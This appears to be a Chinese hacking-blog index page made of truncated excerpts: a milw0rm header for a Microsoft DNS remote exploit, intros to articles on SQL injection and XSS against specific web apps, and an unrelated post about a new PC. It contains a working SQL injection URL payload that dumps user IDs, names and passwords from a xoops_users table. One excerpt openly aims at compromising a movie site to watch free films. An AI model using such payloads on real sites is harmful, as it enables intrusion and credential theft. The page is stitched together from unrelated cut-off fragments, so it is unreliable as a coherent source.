来源:milw0rm
Microsoft DNS Server Remote Code execution Exploit and analysis
Advisory: http://www.microsoft.com/technet/security/advisory/935964.mspx
This remote exploit works against port 445 (also Microsoft RPC api used)
Author:
* Mario Ballano ( mballano~gmail.com )
* Andres Tarasco ( atarasco~gmail.com )
Timeline:
阅读全文 »
构造url语句:
/**/UNION/**/SELECT/**/NULL,NULL,NULL,NULL,uid,uname,pass,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/xoops_users/**/LIMIT/**/1,1/*
作者:月无痕&&花非花
来源:红狼安全小组(www.wolfexp.net,www.crst.com.cn)
注:本文以发表于黑客手册,转载请加上出处
一.接触起因
这几天事情较多,一直都没去老大的论坛转!今天好友joli突然Q我说论坛上有人发了个脚本的问题,叫我也一起看一下,于是我就跑过去看了下(你家离论坛很近?竟然可以跑着过去!),也就有了下面这篇文章(测试版本为讯时新闻发布系统v2.70版 )。
二.漏洞初探
打算先看有没有经典的OR漏洞,虽然已经出来很久的漏洞了,但是很多程序仍然会存在这样的漏洞,admin_login.asp存在如下代码:
阅读全文 »
by Superhei@ph4nt0m
2007-04-15
http://www.ph4nt0m.org
includes/update_profile_include.php
阅读全文 »
昨天爸爸给我钱,然后今天就去换了新老婆(电脑),对我来说,电脑就跟老婆差不多,从高二到现在,四年了,都是电脑陪着我。
show下新电脑的配置:
CPU AM2 Athlon 64 X2 4000+(65nm)
主板 华硕 M2N
内存 黑金刚 金刚版 DDRII 800 1GB
硬盘 希捷 酷鱼7200.10/ST3320620AS(雷射盒装)
显卡 七彩虹 天行7600GS-GD3 CF黄金版 256M T20
刻录机 先锋 DVR-112CH
显示器 三星 740N plus
机箱 爱国者 CA-F638
键鼠 微软 光学极动套装
音箱 漫步者 R201T06
将近6K,不算是好的配置,本来CPU想用酷睿E6300 阅读全文 »
鬼仔注:利用跨站,让管理员执行指定的动作,这个思路以前就在哪里看过,这里是个实例。
信息来源:http://www.hacklu.net
作者:樱花浪子[I.S.T]
注:本文首发于黑客手册,.转载请注明来源
06年就这样像3389离我而去,07年就像4489在迎接着我们。不知不觉又长了一岁。06年可以说是注入淡却的一年。不过新的技术也在增长。
跨站虽然算不上新的技术。但在国外也是非常重视的。其实跨站代码如果构造好的话可以干出很多事来的。这不,在网上逛到了一个电影网站。
心想如果把这个站拿下来不就可以看免费的电影了。(动机不太好呀^_^)。发现程序用的是:"世纪热线全站程序完美版"于是去百度搜一下也没发有漏
洞。那么就自己下回来慢慢研究吧。
阅读全文 »
